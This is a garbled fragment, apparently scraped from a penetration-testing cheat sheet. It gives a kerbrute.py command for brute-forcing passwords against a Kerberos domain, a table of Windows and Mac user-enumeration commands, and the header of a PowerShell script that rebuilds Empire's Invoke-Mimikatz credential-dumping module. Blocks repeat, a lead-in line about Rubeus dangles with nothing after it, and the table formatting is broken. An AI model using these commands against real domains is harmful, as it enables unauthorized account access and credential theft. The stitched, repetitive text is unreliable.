With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| Domain: TEST.local | |
| User Enumeration: | |
| Windows: | |
| net user | |
| net user /domain | |
| net user [username] | |
| net user [username] /domain | |
| wmic useraccount | |
| Mac: | |
| dscl . ls /Users |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| <# | |
| .Synopsis | |
| Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel) | |
| .DESCRIPTION | |
| Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1 | |
| .PARAMETER DllPath | |
| Path to powerkatz.dll generated via Visual Studio. | |
| .PARAMETER ScriptPath | |
| Path to Invoke-Mimikatz.ps1 script. |